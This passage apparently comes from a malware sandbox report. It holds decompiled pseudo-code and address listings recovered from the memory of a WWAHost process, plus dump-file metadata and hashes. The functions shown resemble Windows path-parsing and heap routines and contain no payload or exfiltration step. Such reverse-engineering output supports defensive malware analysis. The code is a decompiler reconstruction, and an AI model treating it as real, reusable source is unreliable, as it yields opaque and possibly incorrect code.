														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0399F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0399F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03A24CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E039AD130(_t427, _t494, _t511);
				}
			}










































































                                              0x03a25ba5
                                              0x03a25baa
                                              0x03a25baf
                                              0x03a25bb4
                                              0x03a25bb6
                                              0x03a25bbc
                                              0x03a25bbe
                                              0x03a25bc4
                                              0x03a25bcd
                                              0x03a25bd3
                                              0x03a25bd6
                                              0x03a25bdc
                                              0x03a25be0
                                              0x03a25be3
                                              0x03a25beb
                                              0x03a25bf2
                                              0x03a25bf8
                                              0x03a25bfe
                                              0x03a25c04
                                              0x03a25c0e
                                              0x03a25c18
                                              0x03a25c1f
                                              0x03a25c25
                                              0x03a25c2a
                                              0x03a25c2c
                                              0x03a25c32
                                              0x03a25c3a
                                              0x03a25c3f
                                              0x03a25c42
                                              0x03a25c48
                                              0x03a25c5b
                                              0x03a25c5b
                                              0x03a25c2c
                                              0x03a25cb7
                                              0x03a25cb9
                                              0x03a25cbf
                                              0x03a25cc2
                                              0x03a25cca
                                              0x03a25ccb
                                              0x03a25ccb
                                              0x03a25cd1
                                              0x03a25cd7
                                              0x03a25cda
                                              0x03a25ce1
                                              0x03a25ce4
                                              0x03a25ce7
                                              0x03a25ced
                                              0x03a25cf3
                                              0x03a25cf9
                                              0x03a25cff
                                              0x03a25d08
                                              0x03a25d0a
                                              0x03a25d0e
                                              0x03a25d10
                                              0x00000000
                                              0x00000000
                                              0x03a25d16
                                              0x03a25d1a
                                              0x00000000
                                              0x00000000
                                              0x03a25d20
                                              0x03a25d22
                                              0x03a25d25
                                              0x03a25d2f
                                              0x03a25d2f
                                              0x03a25d33
                                              0x03a25d3d
                                              0x03a25d49
                                              0x03a25d4b
                                              0x00000000
                                              0x00000000
                                              0x03a25d5a
                                              0x03a25d5d
                                              0x03a25d60
                                              0x00000000
                                              0x00000000
                                              0x03a25d66
                                              0x03a25d69
                                              0x00000000
                                              0x00000000
                                              0x03a25d6f
                                              0x03a25d6f
                                              0x03a25d73
                                              0x03a25d79
                                              0x03a25d7f
                                              0x03a25d86
                                              0x03a25d95
                                              0x03a25d98
                                              0x03a25dba
                                              0x03a25dcb
                                              0x03a25dce
                                              0x03a25dd3
                                              0x03a25dd6
                                              0x03a25dd8
                                              0x03a25de6
                                              0x03a25dec
                                              0x03a25dee
                                              0x03a25df1
                                              0x03a25df3
                                              0x03a2635a
                                              0x03a2635a
                                              0x00000000
                                              0x03a2635a
                                              0x03a25dfe
                                              0x03a25e02
                                              0x03a25e05
                                              0x03a25e07
                                              0x03a25e10
                                              0x03a25e13
                                              0x03a25e1b
                                              0x03a25e1c
                                              0x03a25e21
                                              0x03a25e22
                                              0x03a25e23
                                              0x03a25e25
                                              0x03a25e2a
                                              0x03a25e2c
                                              0x03a25e2e
                                              0x03a25e36
                                              0x03a25e39
                                              0x03a25e42
                                              0x03a25e47
                                              0x03a25e4d
                                              0x03a25e54
                                              0x03a25e54
                                              0x03a25e54
                                              0x03a25e2e
                                              0x03a25e5c
                                              0x03a25e5f
                                              0x03a25e62
                                              0x03a25e64
                                              0x03a25e6b
                                              0x03a25e70
                                              0x03a25e7a
                                              0x03a25e7a
                                              0x03a25e7a
                                              0x03a25e6b
                                              0x03a25e7e
                                              0x03a25e7f
                                              0x03a25e7f
                                              0x03a25e81
                                              0x03a25e87
                                              0x03a25e8b
                                              0x03a25e8c
                                              0x03a25e8c
                                              0x03a25e8c
                                              0x03a25e9a
                                              0x03a25e9c
                                              0x03a25ea2
                                              0x03a25ea6
                                              0x03a25f50
                                              0x03a25f50
                                              0x03a25f57
                                              0x03a25f66
                                              0x03a25f66
                                              0x03a25f66
                                              0x03a25f68
                                              0x03a25f6a
                                              0x03a263d0
                                              0x00000000
                                              0x03a25f70
                                              0x03a25f70
                                              0x03a25f91
                                              0x03a25f9c
                                              0x03a25f9e
                                              0x03a25fa4
                                              0x03a25fa6
                                              0x03a2638c
                                              0x03a26392
                                              0x03a263a1
                                              0x03a263a7
                                              0x03a263af
                                              0x03a263af
                                              0x03a263bd
                                              0x03a263d8
                                              0x00000000
                                              0x03a263d8
                                              0x03a25fac
                                              0x03a25fb2
                                              0x03a25fb4
                                              0x03a25fbd
                                              0x03a25fc6
                                              0x03a25fce
                                              0x03a25fd4
                                              0x03a25fdc
                                              0x03a25fec
                                              0x03a25fed
                                              0x03a25fee
                                              0x03a25fef
                                              0x03a25ff9
                                              0x03a25ffa
                                              0x03a25ffb
                                              0x03a25ffc
                                              0x03a26000
                                              0x03a26004
                                              0x03a26012
                                              0x03a26012
                                              0x03a26018
                                              0x03a26019
                                              0x03a2601a
                                              0x03a2601b
                                              0x03a2601c
                                              0x03a26020
                                              0x03a26059
                                              0x03a2605c
                                              0x03a26061
                                              0x03a26061
                                              0x03a26022
                                              0x03a26022
                                              0x03a26022
                                              0x03a26025
                                              0x03a2602a
                                              0x03a2602b
                                              0x03a26031
                                              0x03a26037
                                              0x03a26038
                                              0x03a2603e
                                              0x03a26048
                                              0x03a26049
                                              0x03a2604a
                                              0x03a2604b
                                              0x03a2604c
                                              0x03a2604d
                                              0x03a26053
                                              0x03a26054
                                              0x03a26054
                                              0x03a26062
                                              0x03a26065
                                              0x03a26067
                                              0x03a2606a
                                              0x03a26070
                                              0x03a26075
                                              0x03a26076
                                              0x03a26081
                                              0x03a26087
                                              0x03a26095
                                              0x03a26099
                                              0x03a2609e
                                              0x03a260a4
                                              0x03a260ae
                                              0x03a260b0
                                              0x03a260b3
                                              0x03a260b6
                                              0x03a260b8
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260be
                                              0x03a260c0
                                              0x03a260c5
                                              0x03a260c5
                                              0x03a260c5
                                              0x03a260c6
                                              0x03a260cd
                                              0x03a26114
                                              0x03a260cf
                                              0x03a260cf
                                              0x03a260d4
                                              0x03a260d5
                                              0x03a260da
                                              0x03a260db
                                              0x03a260e1
                                              0x03a260e2
                                              0x03a260e8
                                              0x03a260f8
                                              0x03a260fd
                                              0x03a260fe
                                              0x03a26102
                                              0x03a26104
                                              0x03a26107
                                              0x03a26109
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610f
                                              0x03a2610f
                                              0x03a26117
                                              0x03a2611a
                                              0x03a2611f
                                              0x03a26125
                                              0x03a26134
                                              0x03a26139
                                              0x03a2613f
                                              0x03a26146
                                              0x03a26148
                                              0x03a2614b
                                              0x03a2614d
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a26153
                                              0x03a26159
                                              0x03a26159
                                              0x03a2615c
                                              0x03a26163
                                              0x03a26169
                                              0x03a2616c
                                              0x03a26172
                                              0x03a26181
                                              0x03a26186
                                              0x03a26187
                                              0x03a2618b
                                              0x03a26191
                                              0x03a26195
                                              0x03a261a3
                                              0x03a261bb
                                              0x03a261c0
                                              0x03a261c3
                                              0x03a261cc
                                              0x03a261d0
                                              0x03a261dc
                                              0x03a261de
                                              0x03a261e1
                                              0x03a261e4
                                              0x03a261e6
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e6
                                              0x03a261ec
                                              0x03a261f3
                                              0x03a26203
                                              0x03a26209
                                              0x03a2620a
                                              0x03a26216
                                              0x03a2621d
                                              0x03a26227
                                              0x03a26241
                                              0x03a26246
                                              0x03a2624c
                                              0x03a26257
                                              0x03a26259
                                              0x03a2625c
                                              0x03a2625e
                                              0x03a26260
                                              0x03a26260
                                              0x03a26260
                                              0x03a26260
                                              0x03a2625e
                                              0x03a26264
                                              0x03a26267
                                              0x03a26269
                                              0x03a26315
                                              0x03a26315
                                              0x03a2631b
                                              0x03a2631e
                                              0x03a26324
                                              0x03a26327
                                              0x03a2632f
                                              0x03a26330
                                              0x03a26333
                                              0x03a2633a
                                              0x03a2633c
                                              0x03a26335
                                              0x03a26335
                                              0x03a26335
                                              0x03a2633f
                                              0x03a26342
                                              0x03a2634c
                                              0x03a26352
                                              0x03a26355
                                              0x03a26355
                                              0x03a26359
                                              0x00000000
                                              0x03a2626f
                                              0x03a26275
                                              0x03a26275
                                              0x03a26278
                                              0x03a2627e
                                              0x03a2627e
                                              0x03a26281
                                              0x03a26287
                                              0x03a2628d
                                              0x03a26298
                                              0x03a2629c
                                              0x03a262a2
                                              0x03a2629e
                                              0x03a2629e
                                              0x03a2629e
                                              0x03a262a7
                                              0x03a262a7
                                              0x03a262aa
                                              0x03a262b0
                                              0x03a262f0
                                              0x03a262f0
                                              0x03a262f2
                                              0x03a262f8
                                              0x03a262fd
                                              0x03a262b2
                                              0x03a262b2
                                              0x03a262b2
                                              0x03a262b5
                                              0x03a262dd
                                              0x03a262e2
                                              0x03a262e5
                                              0x03a262b7
                                              0x03a262b8
                                              0x03a262bb
                                              0x03a262bd
                                              0x03a262c0
                                              0x03a262c4
                                              0x03a262cd
                                              0x03a262cd
                                              0x03a262c0
                                              0x03a262bb
                                              0x03a262b5
                                              0x03a26302
                                              0x03a26303
                                              0x03a26305
                                              0x03a26305
                                              0x03a26305
                                              0x03a2630c
                                              0x03a2630c
                                              0x00000000
                                              0x03a2627e
                                              0x03a26269
                                              0x03a25eac
                                              0x03a25ebb
                                              0x03a25ebe
                                              0x03a25ecb
                                              0x03a25ecb
                                              0x03a25ece
                                              0x03a25ece
                                              0x03a25ed4
                                              0x03a25ed7
                                              0x03a25ed9
                                              0x03a25edb
                                              0x03a25edb
                                              0x03a25ee1
                                              0x03a25ee1
                                              0x03a25ee3
                                              0x03a25f20
                                              0x03a25f20
                                              0x03a25ee5
                                              0x03a25ee5
                                              0x03a25ee5
                                              0x03a25ee8
                                              0x03a25f11
                                              0x03a25f18
                                              0x03a25eea
                                              0x03a25eea
                                              0x03a25eed
                                              0x03a25ef2
                                              0x03a25ef8
                                              0x03a25efb
                                              0x03a25f0a
                                              0x03a25f0a
                                              0x03a25eed
                                              0x03a25ee8
                                              0x03a25f22
                                              0x03a25f28
                                              0x00000000
                                              0x00000000
                                              0x03a25f30
                                              0x03a25f31
                                              0x03a25f37
                                              0x03a25f3a
                                              0x03a25f3d
                                              0x03a25f44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a25f46
                                              0x03a25f48
                                              0x03a25f4d
                                              0x00000000
                                              0x03a25f4d
                                              0x03a25dda
                                              0x03a25ddf
                                              0x00000000
                                              0x03a25ddf
                                              0x03a25dd8
                                              0x03a25da7
                                              0x03a25da9
                                              0x03a25dac
                                              0x03a25dae
                                              0x00000000
                                              0x03a25db4
                                              0x03a25db4
                                              0x00000000
                                              0x03a25db4
                                              0x03a25dae
                                              0x03a25d88
                                              0x03a25d8d
                                              0x03a26363
                                              0x03a26369
                                              0x03a2636a
                                              0x03a26370
                                              0x03a26372
                                              0x03a2637a
                                              0x03a2637b
                                              0x03a2637d
                                              0x00000000
                                              0x00000000
                                              0x03a2637f
                                              0x03a26385
                                              0x00000000
                                              0x03a26385
                                              0x03a25d38
                                              0x03a25d3b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a25d3b
                                              0x03a25d27
                                              0x03a25d29
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a26360
                                              0x00000000
                                              0x03a26360
                                              0x03a25c10
                                              0x03a25c10
                                              0x03a263da
                                              0x03a263e5
                                              0x03a263e5

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49be0aaa51efe0e43f785c12bee473c29d8ef872e2bc2621c981e276bea403b3
                                              • Instruction ID: e553f43b659d81f6f823045b3521b50a462b0e491e8f46b30de3e7302e2348b5
                                              • Opcode Fuzzy Hash: 49be0aaa51efe0e43f785c12bee473c29d8ef872e2bc2621c981e276bea403b3
                                              • Instruction Fuzzy Hash: A9422875D012298FDB24CF68C880BA9FBB1FF49304F1881AED949AB252E7759985CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03974120 Relevance: .4, Instructions: 444COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E03974120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x3a4d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0398F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03976E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03974620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03976E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M039745F8))) {
												case 0:
													_v568 = 0x3931078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x39311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03974620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0399F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0399F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E039552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0396EB70(1, 0x3a479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0396AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E039995D0();
																			L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0399B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03993D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0399B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                              0x03974128
                                              0x03974135
                                              0x0397413c
                                              0x03974141
                                              0x03974145
                                              0x03974147
                                              0x0397414e
                                              0x03974151
                                              0x03974159
                                              0x0397415c
                                              0x03974160
                                              0x03974164
                                              0x03974168
                                              0x0397416c
                                              0x0397417f
                                              0x03974181
                                              0x0397446a
                                              0x0397446a
                                              0x0397418c
                                              0x03974195
                                              0x03974199
                                              0x03974432
                                              0x03974439
                                              0x0397443d
                                              0x03974442
                                              0x03974447
                                              0x00000000
                                              0x0397419f
                                              0x039741a3
                                              0x039741b1
                                              0x039741b9
                                              0x039741bd
                                              0x039745db
                                              0x039745db
                                              0x00000000
                                              0x039741c3
                                              0x039741c3
                                              0x039741ce
                                              0x039741d4
                                              0x039be138
                                              0x039be13e
                                              0x039be169
                                              0x039be16d
                                              0x039be19e
                                              0x039be16f
                                              0x039be16f
                                              0x039be175
                                              0x039be179
                                              0x039be18f
                                              0x039be193
                                              0x00000000
                                              0x039be199
                                              0x00000000
                                              0x039be199
                                              0x039be193
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039741da
                                              0x039741da
                                              0x039741df
                                              0x039741e4
                                              0x039741ec
                                              0x03974203
                                              0x03974207
                                              0x039be1fd
                                              0x03974222
                                              0x03974226
                                              0x039be1f3
                                              0x039be1f3
                                              0x0397422c
                                              0x0397422c
                                              0x03974233
                                              0x039be1ed
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03974239
                                              0x03974239
                                              0x03974239
                                              0x03974239
                                              0x03974233
                                              0x03974226
